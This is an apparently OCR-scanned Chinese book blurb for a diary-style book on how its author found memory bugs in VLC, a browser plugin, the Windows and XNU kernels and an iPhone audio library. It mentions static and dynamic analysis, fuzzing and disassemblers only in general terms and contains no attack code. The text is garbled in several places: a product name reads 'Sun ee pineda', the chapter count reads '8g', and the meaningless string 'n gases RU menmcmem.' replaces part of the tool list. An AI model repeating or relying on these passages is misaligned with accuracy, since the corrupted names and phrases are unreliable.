软件 的 安全 问题 近年 来 颇 受 媒体 关注 ， 虽 然 软 件 漏洞 和 破解 等 术语 已 广为人知 ， 但 很 多 人 包括 
信息 安全 专业 人 士 ， 并 不 清楚 攻击 者 到 底 是 怎样 发 现 软件 安全 漏洞 的 。 本 书 作 者 以 日 记 的 形式 ， 描 
述 了 自己 在 真实 软件 中 找到 bug 的 方法 和 技巧 ， 旨 在 帮助 读者 形成 自己 的 捉 虫 风格 ， 从 而 顺利 找 出 软 
件 中 的 bug。 


书 中 内 容 共 分 为 8g 章 ， 第 1 章 为 概述 ， 其 余 7 章 是 7 篇 日 记 ， 分 别 记 录 了 作者 近 几 年 找到 的 比较 典 
型 的 内 存 bug， 涉 及 VLC 媒 体 播放 器 、Sun ee pineda 浏览 
插件 、Windows 操 作 系 统 内 核 、 苹 果 XNU 内 核 、iPhone 音 频 库 。 作 者 将 静态 分 析 和 动态 分 析 、 模 糊 
n gases RU menmcmem. 反 汇 编 工 具 等 专用 
漏洞 挖掘 工具 的 具体 使 用 方法 ， 可 以 让 读者 逐 层 建立 起 各 种 概念 ， 全 面 掌 握 安 全 调试 知识 。 
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